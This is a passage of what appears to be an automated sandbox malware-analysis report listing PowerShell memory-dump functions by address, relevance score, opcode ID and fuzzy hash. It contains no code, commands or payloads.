                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                              Function 00007FFD9B893428 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4883efb356249540f70a8c03f473d0857f3e4ed5bc23fb3f77f21f38d08ff7bd
                                                                                                              • Instruction ID: 2300b3399a897ed59524608a12ec64372c440e50dedbaaa65fae7179a79580c0
                                                                                                              • Opcode Fuzzy Hash: 4883efb356249540f70a8c03f473d0857f3e4ed5bc23fb3f77f21f38d08ff7bd
                                                                                                              • Instruction Fuzzy Hash: 61F03C7264E7C60FE756476CAC624A47FB0DE4323070A42EBD4D1CA4A3D51A584B8751
                                                                                                              Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2041712089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ea15cf285653b6b0db61ec46dd16f53ce65a67ad36ab72de68524cd8f7bb98eb
                                                                                                              • Instruction ID: 90f72af0d1bd6d2522e74f195adb7b19f1be5193dc8c60d3eed008bbe53a5fe5
                                                                                                              • Opcode Fuzzy Hash: ea15cf285653b6b0db61ec46dd16f53ce65a67ad36ab72de68524cd8f7bb98eb
                                                                                                              • Instruction Fuzzy Hash: 98F0E232B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741
                                                                                                              Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2041712089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0abf0583d33714a743d4a78453587f72bee49fca879b94b9840555100b91247c
                                                                                                              • Instruction ID: 6c3930835d8514c92ec3bee2fae3b2024086de9f9015c9e6e788105428d7caf2
                                                                                                              • Opcode Fuzzy Hash: 0abf0583d33714a743d4a78453587f72bee49fca879b94b9840555100b91247c
                                                                                                              • Instruction Fuzzy Hash: 5EF0BE32B0E5498FDB65EB9CE0619A877E0EF0532471600BAE06DCB1B3CA26AC40CB40
                                                                                                              Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2041712089.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                              • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                              • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9B898995 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-1397233021
                                                                                                              • Opcode ID: 150c5aac77cd9f6dae3be5b84ba04b50ed878254495b8de70ef6e179d8a97887
                                                                                                              • Instruction ID: 0a0c0cae6f28283977fe8c25127786136edc7080d54c702a1b88f615d79b4d76
                                                                                                              • Opcode Fuzzy Hash: 150c5aac77cd9f6dae3be5b84ba04b50ed878254495b8de70ef6e179d8a97887
                                                                                                              • Instruction Fuzzy Hash: 9B41BF93A0F6D75FEB2A4769486A4957FA0EF1779470E03F7C0D48B0E3ED08290B8242
                                                                                                              Function 00007FFD9B898BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000B.00000002.2040906107.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                                              • API String ID: 0-622050427
                                                                                                              • Opcode ID: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                                                              • Instruction ID: 67c483b31486e148cdd38e4893d325e3edbe53289e8afd099b86490093a99135
                                                                                                              • Opcode Fuzzy Hash: 72fae20d2bac252b730584b67fdb1a6b21fbfe3d418bd6e58b9d6ffda6c8f105
                                                                                                              • Instruction Fuzzy Hash: 9321C2A7708565DED30A7B7DBC189E93740CF9427878507F3E1AACB093F91860878AD0

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B9662D5 Relevance: .4, Instructions: 439COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2241778480.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cc7c67e1b64b765de7f82bba81e2c6a23c57544918fc050649f4557302f904d
                                                                                                              • Instruction ID: 01f9aa3fe6804ffadc0111a301f5944f98d7f680100b9ce4d4e406a19fd4798a
                                                                                                              • Opcode Fuzzy Hash: 8cc7c67e1b64b765de7f82bba81e2c6a23c57544918fc050649f4557302f904d
                                                                                                              • Instruction Fuzzy Hash: BBD14522A1FA896FEB65DBA848659B57FE0EF52250B0901FFD05DC70E3EA18A905C341
                                                                                                              Function 00007FFD9B77F364 Relevance: .1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2239454503.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b77d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 556df94964e010cb3db53e2b5991779ecbdb7d7a361cc80c0b3ff1f3105e2883
                                                                                                              • Instruction ID: b15849910b0fbc69dffe5d75a1f34754c7801c07ff49cc2824748656ffd3c6b4
                                                                                                              • Opcode Fuzzy Hash: 556df94964e010cb3db53e2b5991779ecbdb7d7a361cc80c0b3ff1f3105e2883
                                                                                                              • Instruction Fuzzy Hash: 7E41377150EBC44FE7668B3898919523FF0EF56320B1606EFD088CF1B3D625A846C7A2
                                                                                                              Function 00007FFD9B89A415 Relevance: .1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 117577961b6a2aebb0e478189b1fe449a81fb6f034facd5956aca9f09ee896b8
                                                                                                              • Instruction ID: dd815d15cb9dad684d93857869267ba1cee3a86b2c5b3241e02d571f446ddb88
                                                                                                              • Opcode Fuzzy Hash: 117577961b6a2aebb0e478189b1fe449a81fb6f034facd5956aca9f09ee896b8
                                                                                                              • Instruction Fuzzy Hash: 6031C23190DB8C8FEB59DB68985A6E97FF0EB96320F0441AFD048C7163DA34584AC792
                                                                                                              Function 00007FFD9B89A45C Relevance: .1, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd532f073f87ca28e962cfedead8138db8f7fb7abcf86a38607d7d6c157d6215
                                                                                                              • Instruction ID: e188890003895931482fca4b5d6a289c6829959ab00f42f7212edb9e1640a124
                                                                                                              • Opcode Fuzzy Hash: dd532f073f87ca28e962cfedead8138db8f7fb7abcf86a38607d7d6c157d6215
                                                                                                              • Instruction Fuzzy Hash: 7521D731A0CB4C8FDB58DF9C984A7E97BE0EB99321F00416FD449C3156DA709456CB92
                                                                                                              Function 00007FFD9B9664E3 Relevance: .1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2241778480.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d289b56a851c19ad1ff7b51f3d7f067325103c7fa5b70cacff06ef254258479c
                                                                                                              • Instruction ID: f6295fb1d35ec0a3645c5a59229acbccaa22209441143c1a7e52cd5242f4f5d2
                                                                                                              • Opcode Fuzzy Hash: d289b56a851c19ad1ff7b51f3d7f067325103c7fa5b70cacff06ef254258479c
                                                                                                              • Instruction Fuzzy Hash: 0911C232B1E6499FEB64DA9890A59B8BBE1EF58310F5900BFC05DD7097DE2AA805C350
                                                                                                              Function 00007FFD9B89BCF9 Relevance: .1, Instructions: 57COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f12fdadf10de8a600d49402d546d9023ad5c02492c228314edb14d24b7de8c3
                                                                                                              • Instruction ID: 41351bd85cab21a89064e7bd1abdbb4ca9aaadb42470e207ac96ed00ce636d64
                                                                                                              • Opcode Fuzzy Hash: 7f12fdadf10de8a600d49402d546d9023ad5c02492c228314edb14d24b7de8c3
                                                                                                              • Instruction Fuzzy Hash: FE01847271CA094FEF9CDA5CE8A19B577D1EB99320B10017EE48AC32DAD926F8428745
                                                                                                              Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                              • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                                                              Function 00007FFD9B89BD68 Relevance: .0, Instructions: 39COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58b30047d7e44f079066e9e7afbe79efcaf13536441b5f12f160c6d55ce256cb
                                                                                                              • Instruction ID: beb869301b7f3c17f9f2c19ef0c5b5fb5b9ef6d41d0e8d8b3478cee126f68084
                                                                                                              • Opcode Fuzzy Hash: 58b30047d7e44f079066e9e7afbe79efcaf13536441b5f12f160c6d55ce256cb
                                                                                                              • Instruction Fuzzy Hash: BAF0303275C6088FDB5CAA5CF8529B573D1EB99320B10016EE48BC3696E927E8428685
                                                                                                              Function 00007FFD9B899BD8 Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                              • Instruction ID: 0314c12138fd19f11714d0f4204d7559e7e9e4364f424aa80ec3c132048589b3
                                                                                                              • Opcode Fuzzy Hash: 1b3ea643f17a63e63a1b7d5800bf695a9227f7625860bda10ae9635cfdad58f6
                                                                                                              • Instruction Fuzzy Hash: E3F0243080CA8D8FDB06EF6888695D57FA0EF16311B05029BE448C71B2DB649598CBC2
                                                                                                              Function 00007FFD9B963DED Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2241778480.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 53eeb90e7da4fb5af7ff62e70c0d320b3b1a1e3b334adf679fb6e7474ec4389c
                                                                                                              • Instruction ID: fc74e85f1804bd725eaefbfe003f90015941b08a50e10259f305bf6bedac7134
                                                                                                              • Opcode Fuzzy Hash: 53eeb90e7da4fb5af7ff62e70c0d320b3b1a1e3b334adf679fb6e7474ec4389c
                                                                                                              • Instruction Fuzzy Hash: 81F0E232B0E5098FD7A9EB5CE4918A877E0EF4532071500BAE06DC75B3CA25EC40C750
                                                                                                              Function 00007FFD9B9640D0 Relevance: .0, Instructions: 35COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2241778480.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b960000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 35d49233b2fbb285dd2e9f54b3cc017c2eb5bd5b82a3c00d40ace1075663f872
                                                                                                              • Instruction ID: dee2b3339c46b0865f68cf55d935c9a726c89bd9fa18e323d27bb272e4cd07c4
                                                                                                              • Opcode Fuzzy Hash: 35d49233b2fbb285dd2e9f54b3cc017c2eb5bd5b82a3c00d40ace1075663f872
                                                                                                              • Instruction Fuzzy Hash: 11F08232B0E5498FDB65EB9CE4519E877E0EF1532471600BAE16DCB5B7CA25EC44C740

                                                                                                              Non-executed Functions

                                                                                                              Function 00007FFD9B898BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^=$M_^@$M_^T$M_^U$M_^W$M_^Y
                                                                                                              • API String ID: 0-134851635
                                                                                                              • Opcode ID: e08489abfce4cf7a697b71979abb8e19ec120618cae9483cec92bb109a7623a4
                                                                                                              • Instruction ID: bfefcb82d6efc08166ea6a51294a2a5ba2bcff1f56c9a4cfe65288ae78aacc0f
                                                                                                              • Opcode Fuzzy Hash: e08489abfce4cf7a697b71979abb8e19ec120618cae9483cec92bb109a7623a4
                                                                                                              • Instruction Fuzzy Hash: 4D2165B3714529DAD70A36ADBC199E83780EF9137638603F3D265CB183FC58A48799C0
                                                                                                              Function 00007FFD9B8984FA Relevance: 6.3, Strings: 5, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000010.00000002.2240720554.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_16_2_7ffd9b890000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                              • API String ID: 0-679677686
                                                                                                              • Opcode ID: c7e7712e0d355e868c8a2eb80d6ccf690f97e7059d328fdcbe068a6084317d2e
                                                                                                              • Instruction ID: 65d6d0e121c8e014a3c3c0cf11cf56459ef5460626309968a3ab4aa9da65387b
                                                                                                              • Opcode Fuzzy Hash: c7e7712e0d355e868c8a2eb80d6ccf690f97e7059d328fdcbe068a6084317d2e
                                                                                                              • Instruction Fuzzy Hash: 3621E593F0BD9757EB66076E88A94996F90FF55B9875A03B2C0E887093BD04740B4181

                                                                                                              Executed Functions

                                                                                                              Function 00007FFD9B8860ED Relevance: .8, Instructions: 785COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2505163950.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b880000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7bc0fe526f17862e287c06b19757786a5198edba5766f6a73ada4c8b8baf7aed
                                                                                                              • Instruction ID: f1fa6cb5e60418e47466ca7f3f06fefed5b55e021037152b550f28f67c79d6cf
                                                                                                              • Opcode Fuzzy Hash: 7bc0fe526f17862e287c06b19757786a5198edba5766f6a73ada4c8b8baf7aed
                                                                                                              • Instruction Fuzzy Hash: 7F811957B0E7A64FD326B7ACB8B51E93F60DF4222970A01F7C1D9CA0A3ED58544A83D1
                                                                                                              Function 00007FFD9B95631D Relevance: .4, Instructions: 406COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2506780328.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b950000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e3bdee6eb2cf1438cd294455a28b4155b6ceb5117747affee1b94094a74a954f
                                                                                                              • Instruction ID: cda79d830dbf9b8829b4b1bed901d2f3a733fe576b5f646df9f62236e8a33e55
                                                                                                              • Opcode Fuzzy Hash: e3bdee6eb2cf1438cd294455a28b4155b6ceb5117747affee1b94094a74a954f
                                                                                                              • Instruction Fuzzy Hash: C5C17932B5FA8E1FEBA9DBA848755B97BE0EF11350B0501BED85DC70E3DA18A905C341
                                                                                                              Function 00007FFD9B953EC4 Relevance: .4, Instructions: 371COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2506780328.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b950000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ac2d7ffc7c4f6ed0bf7deeebb9ae88d961993e468a0dc9769b59ecf62242511
                                                                                                              • Instruction ID: 7c9fc05098029560a24b66f251da72ff5ea89844161210723b6194cb7d12ca2d
                                                                                                              • Opcode Fuzzy Hash: 8ac2d7ffc7c4f6ed0bf7deeebb9ae88d961993e468a0dc9769b59ecf62242511
                                                                                                              • Instruction Fuzzy Hash: 57A15822B5F6C91FE7A697B858256A07FE0EF52210B1A01FFD88DCB1E7D9086D05C351
                                                                                                              Function 00007FFD9B953D13 Relevance: .2, Instructions: 186COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2506780328.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b950000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 58035ecd9ec794c71ab4e644259f99dc2d8b8b4358fb21a996d548aa42c6cb61
                                                                                                              • Instruction ID: dd5f20c9d8dbbf6a9cbed721604d9c88927b3ee73795c84440239441dfd707a2
                                                                                                              • Opcode Fuzzy Hash: 58035ecd9ec794c71ab4e644259f99dc2d8b8b4358fb21a996d548aa42c6cb61
                                                                                                              • Instruction Fuzzy Hash: 9F516B32B5EA8E1FE7AACAAC547167477E2EF85610B1900BAC45FC75E3DE14EC058341
                                                                                                              Function 00007FFD9B88A2FA Relevance: .2, Instructions: 168COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2505163950.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b880000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: edad3cce414fde6923cfcf72b14ef50ce251ef728043939808e00c8d48824a87
                                                                                                              • Instruction ID: c13b2ef10aaa119e57f3e1bd35dae0e0d9412142d4152a331bcdcf4c8addd060
                                                                                                              • Opcode Fuzzy Hash: edad3cce414fde6923cfcf72b14ef50ce251ef728043939808e00c8d48824a87
                                                                                                              • Instruction Fuzzy Hash: F6415B71A0EB8D5FD715CBAC9C696E47FA0EF56320F0801BBC098C70A3EA746506C791
                                                                                                              Function 00007FFD9B76EE24 Relevance: .1, Instructions: 125COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2503597420.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b76d000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b4694b6036e0741242f9e243b93eaba2e1ef5e9c1a3442e5404afdc57e25978
                                                                                                              • Instruction ID: 750552de477747ceb61f41eb1f6316a9a90f8e8402d211f48a1a43f3f17c1ba6
                                                                                                              • Opcode Fuzzy Hash: 0b4694b6036e0741242f9e243b93eaba2e1ef5e9c1a3442e5404afdc57e25978
                                                                                                              • Instruction Fuzzy Hash: 2341067150EBC89FE7569B2898559523FF0EF52320B1A06DFD088CB1B3D625A846C7A3
                                                                                                              Function 00007FFD9B953D5F Relevance: .1, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2506780328.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b950000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76e7e1d69abd03632e945030696cafc3974bd4111c936cbf861fe2d3aadde625
                                                                                                              • Instruction ID: 0e57534c81a892d376c88768eec5e2907a0e0ff0d5f58ea22fc18c75eb80ce0b
                                                                                                              • Opcode Fuzzy Hash: 76e7e1d69abd03632e945030696cafc3974bd4111c936cbf861fe2d3aadde625
                                                                                                              • Instruction Fuzzy Hash: A7210562B6F98A2FE7BACAEC447153467E1EF51210B5A00BAD85FC75F2DE18EC058301
                                                                                                              Function 00007FFD9B95408C Relevance: .1, Instructions: 66COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2506780328.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b950000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: df4667e17ad273e4e87d5914c037a31f45be17cd506977f899c9219262b4a034
                                                                                                              • Instruction ID: 48bb63f3285916ee0c3452c3d21df936c94cf78f3efdb5a40f8b781bea09d85a
                                                                                                              • Opcode Fuzzy Hash: df4667e17ad273e4e87d5914c037a31f45be17cd506977f899c9219262b4a034
                                                                                                              • Instruction Fuzzy Hash: 24113432B6F5895FEBF4D6E8846567877D1EF11220B1A00BDC85DC72AAD944AC008301
                                                                                                              Function 00007FFD9B8833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2505163950.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_7ffd9b880000_powershell.jbxd
